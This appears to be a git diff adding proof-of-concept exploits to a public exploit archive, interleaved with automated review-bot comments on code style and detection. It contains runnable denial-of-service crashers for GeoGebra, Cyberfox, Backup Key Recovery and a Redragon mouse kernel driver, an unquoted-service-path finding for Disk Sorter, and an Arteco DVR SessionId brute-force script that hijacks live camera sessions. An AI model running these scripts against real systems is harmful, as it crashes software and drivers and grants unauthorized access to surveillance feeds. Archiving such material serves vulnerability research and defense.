41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 0x41414141`41414141 +41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0x41414141`41414141 +41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 0x41414141`41414141 +00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 0x41414141`41414141 +00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 0x20027f +00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 00000000`00000000 MSVCR90!pow+0x4e0 \ No newline at end of file diff --git a/exploits/windows/dos/50322.py b/exploits/windows/dos/50322.py new file mode 100755 index 000000000..8aae0f2df --- /dev/null +++ b/exploits/windows/dos/50322.py 
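Review bot: Everything from `[Bugcheck Analysis]` to the final `MSVCR90!pow+0x4e0` frame is appended to the `.py` file unquoted, so the file is not valid Python; the debugger transcript belongs in a `#` comment block or a companion `.txt` (compare 50014.txt in this same commit). `ioctl_list`, `devicename` and the `io`, `product` and `argv` imports are unused. The `!analyze` output is the part a defender actually uses — a 0xF7 DRIVER_OVERRAN_STACK_BUFFER with SYMBOL_NAME `GM312Fltr+e1e` and PROCESS_NAME `pythonw.exe` is what crash-dump triage keys on to attribute the bugcheck to this driver — so it is worth keeping, just not as code.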
@@ -0,0 +1,32 @@
+# Exploit Title: Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)
+# Date: 27/08/2021
+# Exploit Author: Quadron Research Lab
+# Version: all version
+# Tested on: Windows 10 x64 HUN/ENG Professional
+# Vendor: https://www.redragonzone.com/pages/download
+# Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/REDRAGON_MOUSE
+
+
+import ctypes, sys
+from ctypes import *
+import io
+from itertools import product
+from sys import argv
+
+devicename = "REDRAGON_MOUSE"
+
+ioctl = 0x222414
+
+kernel32 = windll.kernel32
+hevDevice = kernel32.CreateFileA("\\\\.\\GLOBALROOT\\Device\REDRAGON_MOUSE", 0xC0000000, 0, None, 0x3, 0, None)
+
+if not hevDevice or hevDevice == -1:
+    print ("Not Win! Sorry!")
+
+else:
+    print ("OPENED!")
+
+    buf = '\x44' * 1000 + '\x00' * 1000
+    bufLength = 2000
+
+    kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None)
\ No newline at end of file
diff --git a/exploits/windows/local/49653.py b/exploits/windows/local/49653.py
new file mode 100755
index 000000000..fcb17788a
--- /dev/null
+++ b/exploits/windows/local/49653.py
@@ -0,0 +1,26 @@
+# Exploit Title: GeoGebra Graphing Calculato‪r‬ 6.0.631.0 - Denial Of Service (PoC)
+# Date: 2021-03-15
+# Exploit Author: Brian Rodriguez
+# Vendor Homepage: https://www.geogebra.org
+# Software Link: https://www.geogebra.org/download
+# Version: 6.0.631.0-offlinegraphing
+# Tested on: Windows 8.1 Pro
+
+# STEPS
+# Open the program Graficadora
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt in the field "Entrada..."
+# Crashed
+
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 8000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")
\ No newline at end of file
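Review bot: The device path `"\\\\.\\GLOBALROOT\\Device\REDRAGON_MOUSE"` escapes every backslash except the last one; `\R` is not a recognised escape, so it happens to survive as a literal backslash, but it is inconsistent and newer Python versions warn on it — write `\\REDRAGON_MOUSE`. The `devicename` variable and the `io`, `product` and `argv` imports are unused. The file shares its skeleton with 50311.py in this commit, so the two should at least agree on which of these leftovers they keep.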
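Review bot: The marker line `--> payload.py <--` in 49653.py is not a comment, so the `.py` file does not parse and neither the `# STEPS` block nor the script below it can be run as committed; either drop the marker or make it `# --> payload.py <--`. The same layout is in 49654.py and 49655.py. The bare `except:` in all three (and in 50336.py further down) hides the real reason the file could not be written and also catches KeyboardInterrupt; `except OSError as e: print("File cannot be created:", e)` keeps the message and adds the cause.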
diff --git a/exploits/windows/local/49654.py b/exploits/windows/local/49654.py
new file mode 100755
index 000000000..dbb7ccf58
--- /dev/null
+++ b/exploits/windows/local/49654.py
@@ -0,0 +1,26 @@
+# Exploit Title: GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)
+# Date: 2021-03-15
+# Exploit Author: Brian Rodriguez
+# Vendor Homepage: https://www.geogebra.org
+# Software Link: https://www.geogebra.org/download
+# Version: 5.0.631.0-d
+# Tested on: Windows 8.1 Pro
+
+#STEPS
+# Open the program GeoGebra
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content in the field "Entrada:"
+# Crashed
+
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 800000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/windows/local/49655.py b/exploits/windows/local/49655.py
new file mode 100755
index 000000000..6e1767b28
--- /dev/null
+++ b/exploits/windows/local/49655.py
@@ -0,0 +1,26 @@
+# Exploit Title: GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)
+# Date: 2021-03-15
+# Exploit Author: Brian Rodriguez
+# Vendor Homepage: https://www.geogebra.org
+# Software Link: https://www.geogebra.org/download
+# Version: 6.0.631.0-offlinecas
+# Tested on: Windows 8.1 Pro
+
+# STEPS
+# Open the program Calculadora CAS
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt in the field "Entrada..."
+# Crashed
+
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 8000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/windows/local/49966.py b/exploits/windows/local/49966.py
new file mode 100755
index 000000000..2b366dbe1
--- /dev/null
+++ b/exploits/windows/local/49966.py
@@ -0,0 +1,21 @@
+# Exploit Title: Backup Key Recovery 2.2.7 - Denial of Service (PoC)
+# Date: 07/06/2021
+# Author: Erick Galindo
+# Vendor Homepage: http://www.nsauditor.com
+# Software http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
+# Version: 2.2.7.0
+# Tested on: Windows 10 Pro x64 es
+
+# Proof of Concept:
+#1.- Copy printed "AAAAA..." string to clipboard!
+#2.- Open BackupKeyRecovery.exe
+#3.- Go to Register > Enter Registration Code...
+#4.- Write anything in 'Name' field
+#5.- Paste clipboard in 'Key' field
+#6.- Click on button -> Ok
+
+buffer = "\x41" * 256
+
+f = open ("poc.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/50014.txt b/exploits/windows/local/50014.txt
new file mode 100644
index 000000000..b56925919
--- /dev/null
+++ b/exploits/windows/local/50014.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path
+# Discovery by: BRushiran
+# Date: 15-06-2021
+# Vendor Homepage: https://www.disksorter.com
+# Software Links: https://www.disksorter.com/setups_x64/disksorterent_setup_v13.6.12_x64.exe
+# Tested Version: 13.6.12
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+Disk Sorter Enterprise Disk Sorter Enterprise C:\Program Files\Disk
+Sorter Enterprise\bin\disksrs.exe Auto
+
+C:\>sc qc "Disk Sorter Enterprise"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Disk Sorter Enterprise
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 0 IGNORE
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Sorter
+Enterprise\bin\disksrs.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Disk Sorter Enterprise
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/50336.py b/exploits/windows/local/50336.py
new file mode 100755
index 000000000..f96f9b2fa
--- /dev/null
+++ b/exploits/windows/local/50336.py
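Review bot: The service binary path is wrapped across two lines in both the `wmic` output (`C:\Program Files\Disk` / `Sorter Enterprise\bin\disksrs.exe`) and the `sc qc` output, which obscures the unquoted path that is the whole point of the entry; keep `NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe` on one line. The `sc qc` transcript is in Spanish (`CORRECTO`, `NOMBRE_SERVICIO`), which the `Tested on` header line could mention so readers do not look for the English field names. The `NOMBRE_INICIO_SERVICIO: LocalSystem` and `TIPO_INICIO : 2 AUTO_START` lines are what make the finding matter and deserve a one-line remark; the vendor-side fix is quoting the service's ImagePath.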
@@ -0,0 +1,27 @@
+# Exploit Title: Cyberfox Web Browser 52.9.1 - Denial of Service (PoC)
+# Date: 2021-09-26
+# Exploit Author: Aryan Chehreghani
+# Vendor Homepage: https://cyberfox.8pecxstudios.com
+# Software Link: https://www.techspot.com/downloads/6568-cyberfox-web-browser.html
+# Version: v52.9.1 (Possibly all versions)
+# Tested on: windows
+
+#[ About - Cyberfox ] :
+#Cyberfox is a Mozilla-based Internet browser designed to take advantage of 64-bit architecture
+#but a 32-bit version is also available.The application provides a higher memory performance when navigating your favorite pages.
+
+# [ Exploit/POC ] :
+# 1.Run the python script, it will create a new file "output.txt"
+# 2.Run Cyberfox Web Browser
+# 3.Copy the content of the file "output.txt" & Paste into the "search bar"
+# 4.Crashed
+
+Overflow = "\x41" * 9000000
+try:
+    f=open("output.txt","w")
+    print("[!] Creating %s bytes DOS payload...." %len(Overflow))
+    f.write(Overflow)
+    f.close()
+    print("[!] File Created !")
+except:
+    print("File cannot be created")
\ No newline at end of file
diff --git a/exploits/windows/webapps/49348.py b/exploits/windows/webapps/49348.py
new file mode 100755
index 000000000..3ca7dea76
--- /dev/null
+++ b/exploits/windows/webapps/49348.py
@@ -0,0 +1,100 @@
+# Exploit Title: Arteco Web Client DVR/NVR - 'SessionId' Brute Force
+# Date: 16.11.2020
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.arteco-global.com
+
+#!/usr/bin/env python3
+#
+#
+# Arteco Web Client DVR/NVR 'SessionId' Cookie Brute Force Session Hijacking Exploit
+#
+#
+# Vendor: Arteco S.U.R.L.
+# Product web page: https://www.arteco-global.com
+# Affected version: n/a
+#
+# Summary: Arteco DVR/NVR is a mountable industrial surveillance server
+# ideal for those who need to manage IP video surveillance designed for
+# medium to large installations that require high performance and reliability.
+# Arteco can handle IP video sources from all major international manufacturers
+# and is compatible with ONVIF and RTSP devices.
+#
+# Desc: The Session ID 'SessionId' is of an insufficient length and can be
+# exploited by brute force, which may allow a remote attacker to obtain a
+# valid session, bypass authentication and disclose the live camera stream.
+#
+# Tested on: Microsoft Windows 10 Enterprise
+# Apache/2.4.39 (Win64) OpenSSL/1.0.2s
+# Apache/2.2.29 (Win32) mod_fastcgi/2.4.6 mod_ssl/2.2.29 OpenSSL/1.0.1m
+# Arteco-Server
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2020-5613
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5613.php
+#
+#
+# 16.11.2020
+#
+
+import sys,requests
+
+class BrutusCookius:
+
+    def __init__(self):
+        self.validate=None
+        self.cookies=None#
+        self.params=None##
+        self.stream=None##
+        self.path=None####
+        self.cgi=None#####
+        self.ip=None######
+        self.op=None######
+
+    def check(self):
+        print('Usage: ./arteco.py IP')
+        exit(9)
+
+    def bro(self):
+        if len(sys.argv) !=2:
+            self.check()
+        else:
+            self.ip=sys.argv[1]
+            print('[+] Target IP: '+self.ip)
+            if not 'http' in self.ip:
+                self.ip='http://{}'.format(self.ip)
+
+    def force(self):
+
+        # Check the Set-Cookie on the target and determine the length (varies per model/version)
+        # Cookie: SessionId=15800 - range(10000,100000)
+        # Cookie: SessionId=8350 - range(1000,10000)
+        # Cookie: SessionId=502 - range(100,1000)
+
+        self.op = range(17129,17149) # Tweak
+        for j in self.op:
+            session=requests.session()
+            self.cookies=dict(SessionId=str(j))
+            sys.stdout.write('[+] Trying ID: '+str(j))
+            self.path='/arteco-mobile/'
+            self.cgi='camera.fcgi'
+            self.params='?serverId=1&camera=2&mode=1&szx=5&szy=5&qty=15&fps=1'
+            self.validate=session.get(self.ip+self.path+self.cgi+self.params, cookies=self.cookies).headers
+            if not 'artecomobile' in str(self.validate):
+                print(' - NOPE.')
+            else:
+                print(' - BINGO!!!')
+                print('[+] Active session found: '+str(j))
+                print('[+] Use the cookie: SessionId='+str(j))
+                exit(9)
+        print('[!] Sorry, no valid session found.')
+
+    def main(self):
+        self.bro()
+        self.force()
+
+if __name__ == '__main__':
+    BrutusCookius().main()
\ No newline at end of file
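Review bot: `exit(9)` is used both for the usage error in `check()` and for the success path in `force()`, so a caller cannot tell the outcomes apart from the status code; use `sys.exit(1)` for the usage error and `sys.exit(0)` on success. `if not 'http' in self.ip` reads better as `if 'http' not in self.ip`, and the trailing `#`, `##`, `######` on the `__init__` assignments are noise that should go. A new `requests.session()` is created on every loop iteration, which defeats the purpose of a session object. From the detection side the request shape in this loop is distinctive — repeated GETs to `/arteco-mobile/camera.fcgi` from one client with a `SessionId` cookie that changes by one each time — and is what a web-server log rule for this device would look for.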
diff --git a/files_exploits.csv b/files_exploits.csv
index 4f3656328..73af0a7a8 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5252,6 +5252,7 @@ id,file,description,date,author,type,platform,port
 40524,exploits/osx/dos/40524.py,"VOX Music Player 2.8.8 - '.pls' Denial of Service",1970-01-01,"Antonio Z.",dos,osx,
 40536,exploits/windows/dos/40536.py,"Mozilla Firefox 49.0.1 - Denial of Service",1970-01-01,"sultan albalawi",dos,windows,
 43596,exploits/windows/dos/43596.py,"OBS Studio 20.1.3 - Local Buffer Overflow",1970-01-01,ScrR1pTK1dd13,dos,windows,
+50311,exploits/windows/dos/50311.py,"Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows,
 43710,exploits/windows/dos/43710.js,"Microsoft Edge Chakra JIT - Incorrect Bounds Calculation",1970-01-01,"Google Security Research",dos,windows,
 43713,exploits/windows/dos/43713.js,"Microsoft Edge Chakra - 'JavascriptGeneratorFunction::GetPropertyBuiltIns' Type Confusion",1970-01-01,"Google Security Research",dos,windows,
 43715,exploits/windows/dos/43715.js,"Microsoft Edge Chakra - Incorrect Scope Handling",1970-01-01,"Google Security Research",dos,windows,
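Review bot: The new `50311` row is inserted between `43596` and `43710`, while the surrounding rows and the whole second hunk keep the file in ascending id order; placing it with the other `503xx` entries keeps the CSV sortable and avoids a conflict with the next batch. The `1970-01-01` date matches every neighbouring row, so it is presumably the index's placeholder convention rather than an error, although the exploit header itself gives `2021/04/07`.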
@@ -6767,8 +6768,22 @@ id,file,description,date,author,type,platform,port 49206,exploits/windows/dos/49206.txt,"TapinRadio 2.13.7 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows, 49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows, 49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",1970-01-01,"Guillaume PETIT",dos,multiple, +49337,exploits/windows/dos/49337.py,"Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)",1970-01-01,stresser,dos,windows, +49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",1970-01-01,LiquidWorm,dos,hardware, +49697,exploits/multiple/dos/49697.py,"ProFTPD 1.3.7a - Remote Denial of Service",1970-01-01,xynmaps,dos,multiple, 49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",1970-01-01,Enesdex,dos,hardware, +49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",1970-01-01,xynmaps,dos,multiple, +49789,exploits/multiple/dos/49789.py,"Hasura GraphQL 1.3.3 - Denial of Service",1970-01-01,"Dolev Farhi",dos,multiple, +49957,exploits/ios/dos/49957.py,"Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, +49964,exploits/windows/dos/49964.py,"NBMonitor 1.6.8 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",dos,windows, +49965,exploits/windows/dos/49965.py,"Nsauditor 3.2.3 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",dos,windows, +49978,exploits/ios/dos/49978.py,"Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, +50001,exploits/ios/dos/50001.py,"Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, +50002,exploits/ios/dos/50002.py,"Post-it 5.0.1 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, +50003,exploits/ios/dos/50003.py,"Notex the best notes 
6.4 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, 50153,exploits/windows/dos/50153.py,"Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)",1970-01-01,stresser,dos,windows, +50266,exploits/windows/dos/50266.py,"SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC)",1970-01-01,"Eric Salario",dos,windows, +50322,exploits/windows/dos/50322.py,"Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows, 50433,exploits/windows/dos/50433.py,"NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows, 50434,exploits/windows/dos/50434.py,"NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux, 
@@ -11279,6 +11294,9 @@ id,file,description,date,author,type,platform,port 49646,exploits/windows/local/49646.txt,"Realtek Wireless LAN Utility 700.1631 - 'Realtek11nSU' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows, 49647,exploits/windows/local/49647.txt,"eBeam education suite 2.5.0.9 - 'eBeam Device Service' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows, 49648,exploits/windows/local/49648.txt,"Interactive Suite 3.6 - 'eBeam Stylus Driver' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows, +49653,exploits/windows/local/49653.py,"GeoGebra Graphing Calculato‪r‬ 6.0.631.0 - Denial Of Service (PoC)",1970-01-01,"Brian Rodriguez",local,windows, +49654,exploits/windows/local/49654.py,"GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)",1970-01-01,"Brian Rodriguez",local,windows, +49655,exploits/windows/local/49655.py,"GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)",1970-01-01,"Brian Rodriguez",local,windows, 49660,exploits/windows/local/49660.py,"FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)",1970-01-01,"Paolo Stagno",local,windows, 49661,exploits/windows/local/49661.txt,"VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path",1970-01-01,"Mohammed Alshehri",local,windows, 49671,exploits/windows/local/49671.txt,"BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path",1970-01-01,"Metin Yunus Kandemir",local,windows, 
@@ -11317,6 +11335,8 @@ id,file,description,date,author,type,platform,port 49929,exploits/windows/local/49929.txt,"Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path",1970-01-01,"Geovanni Ruiz",local,windows, 50061,exploits/windows/local/50061.txt,"SAPSprint 7.60 - 'SAPSprint' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows, 49959,exploits/windows/local/49959.py,"IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP",1970-01-01,"Austin Babcock",local,windows, +49966,exploits/windows/local/49966.py,"Backup Key Recovery 2.2.7 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",local,windows, +49977,exploits/ios/local/49977.py,"memono Notepad Version 4.2 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",local,ios, 49997,exploits/windows/local/49997.txt,"Spy Emergency 25.0.650 - 'Multiple' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows, 49999,exploits/windows/local/49999.txt,"WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows, 50004,exploits/windows/local/50004.txt,"Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows, 
